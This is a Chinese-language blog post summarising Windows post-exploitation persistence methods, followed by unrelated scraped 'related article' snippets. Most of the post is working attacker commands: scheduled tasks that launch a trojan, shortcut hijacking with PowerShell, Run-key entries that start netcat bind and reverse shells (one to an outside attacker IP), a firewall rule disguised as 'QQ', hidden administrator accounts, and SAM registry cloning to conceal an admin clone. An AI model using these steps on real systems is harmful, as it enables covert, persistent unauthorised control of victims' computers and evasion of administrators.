windows系统后渗透阶段权限维持方法小结
前言
归纳下windows系统维持权限的方法
1、schtasks 计划任务
schtasks 是 Windows 自带的命令,使用 schtasks 命令创建计划任务
下面这句的意思是创建一个名称是 test 的计划任务,每隔一分钟去运行一次 5555.exe 文件:
schtasks /create /sc MINUTE /mo 1 /tr C:\Users\Administrator\Desktop\mx\5555.exe /tn test
提前使用 msf 或者 nc 监听上传到目标机器的 5555.exe 木马文件,等到任务自动开始执行后,攻击机就会收到反弹的shell
2、快捷方式劫持
Windows快捷方式包含对系统上安装的软件或文件位置(网络或本地)的引用,快捷方式的文件扩展名是.LNK
- 右键查看软件的属性中的快捷方式的目标路径
- 将下面的命令修改到"目标"输入框并保存
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "invoke-item 'C:\phpstudy_pro\COM\phpstudy_pro.exe'; invoke-item c:\windows\system32\calc.exe"
这个指令里
- 第一个 invoke-item 后面写软件本身的路径
- 第二个 invoke-item 后面写要打开的木马文件,这里是以打开计算器为例
意思是使用 powershell 打开原来的软件本身的同时打开计算器,后者可以修改为上传到目标机器的木马文件或者恶意命令等。用 msf 、nc等提前监听好木马文件的端口,受害机器打开软件后就会反弹 shell
注意:通过这种方式劫持快捷方式会将原应用图标自动修改为 powershell 的图标,所及修改完毕后记得更改一下图标
3、开机自启动注册表项
以下注册表项中的内容(键值)会在开机的时候按照顺序自动启动。因此留后门的思路就是在这些注册表项中添加内容,让它在开机的时候自动启动。
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
(1)手动修改
以上面的第一个注册表项为例,在右侧右键 -> 新建 -> 字符串值 -> 填写名称和要执行的程序或命令
攻击机器使用 msf 监听木马文件内设置的 4444 端口,然后等待目标机器启动,木马文件就会自动运行,攻击机器 msf 成功拿到 shell
(2)使用 msf 自动修改注册表,添加 nc 后门
msf 拿到目标机器的 meterpreter 之后(system权限),进入 meterpreter,然后依次执行下面命令:
# 将 nc 文件从攻击机上传到目标机
upload /root/nc.exe C:\\Windows\\system32# 进入cmd交互环境
shell# 查询下面这个注册表项下的键值
reg query HKLM\software\microsoft\windows\currentversion\run# 在这个注册表项中添加键值,名称是 nc ,值是 nc 的路径,并开启 5555 端口进行正向连接
reg add HKLM\software\microsoft\windows\currentversion\run /v nc /t REG_SZ /d "C:\windows\system32\nc.exe -Ldp 5555 -e cmd.exe"# 查询 nc 键值是否添加成功
reg query HKLM\software\microsoft\windows\currentversion\run /v nc# 查看目标机器防火墙是否开启
netsh firewall show opmode# 设置防火墙不拦截 5555 端口,并将端口伪装成 QQ
netsh firewall add portopening TCP 5555 "QQ" ENABLE ALL# 重启目标机器
shutdown /r /f /t 0
目标机器重启后就可以看到 nc 已经自动启动(我这里是64位的版本)。
此时在攻击机使用 nc 去正向连接即可,ip 是目标机器的 ip
nc 192.168.1.62 5555
真实渗透场景中,攻击机可能不能直接访问内网的目标机器,所以也可以使用反向 shell
在上面添加注册表那一步的时候,将 nc 的命令修改为如下,ip 是攻击机的 IP:
C:\windows\system32\nc.exe -e cmd.exe -d 147.35.24.6 5555
攻击机在后台监听,等待目标机器上线
nc -lvvp 5555
(3)补充
除了上面的5个注册表项,还有以下也可以
# 仅会被自动执行一次
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce# 程序会在系统加载时自动启动执行一次
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce# RunServices是继RunServicesOnce之后启动的程序
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
4、后门账号
(1)添加隐藏账户
这种方式在命令行中 net user 不能看到创建的用户,但是在 控制面板 - 用户账户 中可以看到,同样在机器重启登录的时候也能看到这个用户,所以…这不算真正的隐藏
# 添加后门账户 test1$
net user test1$ passwd123 /add# 后门账户添加到管理员组
net localgroup administrators test1$ /add
与创建普通账户的区别就是在用户名后面加了个 ‘$’ 符号
(2)激活Guest用户
Guest 用户在 Windows 上默认是不开启的,可以把他开启并添加到管理员组,但是被管理员发现的话还是很容易删除
# 设置 guest 账户密码
net user guest passwd123# guest 账户添加到管理员组
net localgroup administrators guest /add# 激活账户
net user guest /active:yes
(3)克隆账户
这种方式隐藏算是比较稳妥的办法。用’$'创建匿名用户,并归到 administrators 用户组
net user test2$ passwd123 /add /y
net localgroup administrators test2$ /add
打开注册表,依次进入如下路径
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
创建的 test2$ 用户类型为 0x3ec,在左侧有对应的一个 000003EC,同样的 Administrator 用户的类型也对应一个 000001F4
将 3.reg 的 F 值替换到 2.reg,也就是 Administrator 用户的 F 值替换给 test2$ 用户
- 在 test2$ 上右键 -> 导出,保存为 1.reg 文件
- 在 000003EC 上右键 -> 导出,保存为 2.reg 文件
- 在 000001F4 上右键 -> 导出,保存为 3.reg 文件
删除 test2$ 用户
net user test2$ /del
在保存 reg 文件的目录打开命令行,导入修改后的 test2$ 用户注册表信息
regedit /s 1.reg
regedit /s 2.reg
此时无论是 net user 、控制面板、登陆页面都无法看到 test2$ 用户
只有知道具体的用户名,通过 net user test2$ 命令才可以看到它的详细信息。此时就隐藏并克隆继承了 Administrator 的全部权限
除此之外,维持权限还有很多方法,例如系统工具替换成 cmd.exe(沾滞键、讲述人等),msf 维权模块、meterpreter 的一些方法等等,
结语
归纳了下一些常见的windows系统维持权限的方法
windows系统后渗透阶段权限维持方法小结相关推荐
- 在 Windows 系统上降低 UAC 权限运行程序(从管理员权限降权到普通用户权限)
在 Windows 系统中,管理员权限和非管理员权限运行的程序之间不能使用 Windows 提供的通信机制进行通信.对于部分文件夹(ProgramData),管理员权限创建的文件是不能以非管理员权限修 ...
- 重装 Windows 系统后键乱码解决方案
重装 Windows 系统后键乱码解决方案 如果您的笔记本因为重装系统后发现键输入乱码,您可以尝试以下方法解决. 第一步.按 Win+R 键,打开运行窗口,或者您也可以在开始菜单找到运行命令.输入 o ...
- 计算机登陆后如何防止自动注销,登录win10系统后自动注销的解决方法
有许多win10系统用户到本站反馈说碰到这样一个问题,就是在登录系统之后,过一会电脑就会自动进入注销状态,然后无法使用,碰到这样的问题要如何处理呢,本教程就给大家分享一下登录win10系统后自动注销的 ...
- 重装系统 linux启动windows系统文件,重装Windows系统后,Linux系统启动引导失败
说明:我的电脑是在装了Windows系统后,装的Linux系统,所以启动引导是Linux干的活.可是,今天重装了Windows系统,启动引导就换成了Windows的,Windows的启动引导把Linu ...
- Windows7重装系统后文件夹权限的混乱
Windows7重装系统后,文件夹权限混乱了,权限选项卡里面所有者成了S-1-5-21-3777879981-2869545487-2372733622-1000的用户,重新授权很麻烦,经常提示无法继 ...
- windows 系统禁止使用 U 盘的方法
windows 系统禁止使用 U 盘的方法 最简单的办法: 注册表 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCntrolSet\Services\USBSTOR] 将名为 ...
- Windows系统局域网共享磁盘、共享文件方法
Windows系统局域网共享磁盘.共享文件方法 实验室有一台windows系统的计算站,计算数据存在计算站上,利用现有的局域网传数据很方便(虽然速度比USB3.0的移动硬盘慢).下面,是参考网上的教程 ...
- 计算机超级用户权限,win7系统获取超级用户权限的方法(图文)
电脑安装上win7操作系统后,都会建立管理员账户,这样能够保护电脑安全.在win7专业版系统中修改和删除一些文件需要获取管理器权限,获取到用户权限,但是其中还有一个超级的用户权限,那么win7系统怎么 ...
- android studio重装后直接,【原创】重装Windows系统后Android studio无需重装,直接迁移...
每次重装Windows系统后重装各种开发环境让人苦不堪言,比如VS2013 +补丁,没有个小半天根本搞不定! 对与Android的开发者,同样安装JDK+Android Studio + Adnroi ...
最新文章
- call/apply/bind 的理解与实例分享
- codeforces-73C. LionAge II
- VIM基础130命令
- debian 8 服务器 稳定,如何在 Debian 8/9/10 上安装最新稳定版 Wine
- jdbc 自增id 原理_面试被问分布式ID怎么办? 滴滴(Tinyid)甩给他
- gradle使用maven_使用Gradle – 2019版从Travis可靠发布到Maven Central
- X264 输出的统计值的含义(X264 Stats Output)
- javascript 取得地址参数
- epc项目设计流程图_EPC工程总承包管理流程图解。
- ls-dyna常用结构单元类型
- 手机WIFI共享 打造便携式WIFI热点
- JavaScript_原型链继承
- 我是如何入行嵌入式开发的
- 恰星V3S投影仪好不好?适合学生党购入么?
- 关于深度学习人工智能模型的探讨(四)(5)
- Android 推送-个推
- php语言中Excel表格导入数据库的方法详解
- python保存3通道图片为8位深度图
- CSS设置高度等于动态的宽度
- java微信公众号开发之各种事件推送